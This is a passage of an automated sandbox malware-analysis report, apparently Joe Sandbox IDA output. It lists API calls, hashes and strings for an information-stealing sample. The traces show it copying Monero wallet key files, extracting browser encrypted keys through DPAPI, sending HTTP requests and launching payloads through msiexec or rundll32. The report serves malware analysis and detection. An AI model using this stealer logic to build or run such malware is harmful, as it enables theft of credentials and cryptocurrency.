                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                        • String ID:
                                        • API String ID: 3555725114-3916222277
                                        • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                        • Instruction ID: b8ee77e0d7826efe1f20cddda4f1c15a5f10c0ad021c5b414e0cc68e0edc059c
                                        • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                        • Instruction Fuzzy Hash: 84E1FF75920308ABCB54EFE4DD91EEEF77AAF14700F404169F20AA6195DF346A89CF50
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00860268,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                        • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                        • StrStrA.SHLWAPI(?,00860028,00420B52), ref: 0040CAF7
                                        • StrStrA.SHLWAPI(00000000,00860058), ref: 0040CB1E
                                        • StrStrA.SHLWAPI(?,00860850,00000000,?,00421458,00000000,?,00000000,00000000,?,0085A038,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                        • StrStrA.SHLWAPI(00000000,008606F0), ref: 0040CCB9
                                          • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                          • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0085A048), ref: 0040C871
                                          • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                          • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                        • StrStrA.SHLWAPI(?,008606F0,00000000,?,0042145C,00000000,?,00000000,0085A048), ref: 0040CD5A
                                        • StrStrA.SHLWAPI(00000000,00859F68), ref: 0040CD71
                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                        • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                        • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                        • String ID:
                                        • API String ID: 3555725114-3916222277
                                        • Opcode ID: 2236b582d876c1c2c2cf0a9da68392ca4524c3185e0707f48217407d9e300ade
                                        • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                        • Opcode Fuzzy Hash: 2236b582d876c1c2c2cf0a9da68392ca4524c3185e0707f48217407d9e300ade
                                        • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • RegOpenKeyExA.ADVAPI32(00000000,0085E1B0,00000000,00020019,00000000,004205B6), ref: 004183A4
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                        • wsprintfA.USER32 ref: 00418459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 6880224c173e2268fae6c439da37811101ec696621e426afcc5573665b815561
                                        • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                        • Opcode Fuzzy Hash: 6880224c173e2268fae6c439da37811101ec696621e426afcc5573665b815561
                                        • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • memset.MSVCRT ref: 00410C1C
                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                        • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                        • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                        • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                        • lstrlenA.KERNEL32(?), ref: 00410CA7
                                        • memset.MSVCRT ref: 00410CCD
                                        • memset.MSVCRT ref: 00410CE1
                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0085A0F8,?,0042110C,?,00000000), ref: 0041A82B
                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0085BE78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                        • String ID: .exe
                                        • API String ID: 1395395982-4119554291
                                        • Opcode ID: 77a7cf6aa2ff457241dc1ecae82feba793c6842ea313e6598fe8f2d8968f1165
                                        • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                        • Opcode Fuzzy Hash: 77a7cf6aa2ff457241dc1ecae82feba793c6842ea313e6598fe8f2d8968f1165
                                        • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: image/jpeg
                                        • API String ID: 2244384528-3785015651
                                        • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                        • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                        • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                        • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                        APIs
                                        • strtok_s.MSVCRT ref: 00411307
                                        • strtok_s.MSVCRT ref: 00411750
                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0085A0F8,?,0042110C,?,00000000), ref: 0041A82B
                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: strtok_s$lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 348468850-0
                                        • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                        • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                        • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                        • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 1111ea304820b60581de47e6ba517b58bc92db88c1ba1125d2209dae070542e3
                                        • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                        • Opcode Fuzzy Hash: 1111ea304820b60581de47e6ba517b58bc92db88c1ba1125d2209dae070542e3
                                        • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                        APIs
                                        • memset.MSVCRT ref: 022F4505
                                        • memset.MSVCRT ref: 022F451C
                                          • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F4553
                                        • lstrcat.KERNEL32(?,0064A30C), ref: 022F4572
                                        • lstrcat.KERNEL32(?,?), ref: 022F4586
                                        • lstrcat.KERNEL32(?,0064A5D8), ref: 022F459A
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022F8FF7: GetFileAttributesA.KERNEL32(00000000,?,022E1DBB,?,?,00425654,?,?,00420E1F), ref: 022F9006
                                          • Part of subcall function 022E9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022E9FA0
                                          • Part of subcall function 022E9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022E9FF9
                                          • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                          • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                          • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                          • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                          • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                          • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                          • Part of subcall function 022F9627: GlobalAlloc.KERNEL32(00000000,022F4644,022F4644), ref: 022F963A
                                        • StrStrA.SHLWAPI(?,0064A0D8), ref: 022F465A
                                        • GlobalFree.KERNEL32(?), ref: 022F4779
                                          • Part of subcall function 022E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D56
                                          • Part of subcall function 022E9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022E5155,00000000,?), ref: 022E9D68
                                          • Part of subcall function 022E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D91
                                          • Part of subcall function 022E9D27: LocalFree.KERNEL32(?,?,?,?,022E5155,00000000,?), ref: 022E9DA6
                                          • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F470A
                                        • StrCmpCA.SHLWAPI(?,004208D1), ref: 022F4727
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 022F4739
                                        • lstrcat.KERNEL32(00000000,?), ref: 022F474C
                                        • lstrcat.KERNEL32(00000000,00420FB8), ref: 022F475B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 1191620704-0
                                        • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                        • Instruction ID: 9909a654cbe1a59b1fc7ced73218e20d6a4779f1f8c9c5d7f42c70c81a1954ef
                                        • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                        • Instruction Fuzzy Hash: E17174B6910218BBDB14FBE0DC45FEEB37AAF49300F4085A8E60996184EB75DB48CF51
                                        APIs
                                        • memset.MSVCRT ref: 0041429E
                                        • memset.MSVCRT ref: 004142B5
                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                        • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                        • lstrcatA.KERNEL32(?,0085FFE0), ref: 0041430B
                                        • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                        • lstrcatA.KERNEL32(?,00860340), ref: 00414333
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                          • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                          • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                          • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                        • StrStrA.SHLWAPI(?,008611F8), ref: 004143F3
                                        • GlobalFree.KERNEL32(?), ref: 00414512
                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                          • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                          • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                        • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                        • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                        • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                        • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 1191620704-0
                                        • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                        • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                        • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                        • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                        APIs
                                        • memset.MSVCRT ref: 00401327
                                          • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                          • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                          • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                          • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                          • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                        • lstrlenA.KERNEL32(?), ref: 0040135C
                                        • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0085BE78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                        • memset.MSVCRT ref: 00401516
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 1930502592-218353709
                                        • Opcode ID: c96eb47dc37f9d21802b40e15ca1c3df189b3e5256dd5690ff6bcb1230a8578c
                                        • Instruction ID: 456b5fac361f61c5265e43a16bd15ab14158e39c7f71a6669150f14a30e0c61c
                                        • Opcode Fuzzy Hash: c96eb47dc37f9d21802b40e15ca1c3df189b3e5256dd5690ff6bcb1230a8578c
                                        • Instruction Fuzzy Hash: 565164B1D5011897CB15FB61DD91BED733CAF54304F4041ADB60A62092EE385BD9CBAA
                                        APIs
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                          • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00861C98), ref: 00406303
                                          • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                          • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00861180,00000000,00000000,00400100,00000000), ref: 00406385
                                          • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                          • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                        • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                        • lstrlenA.KERNEL32(00000000), ref: 00415383
                                        • strtok.MSVCRT(00000000,?), ref: 0041539E
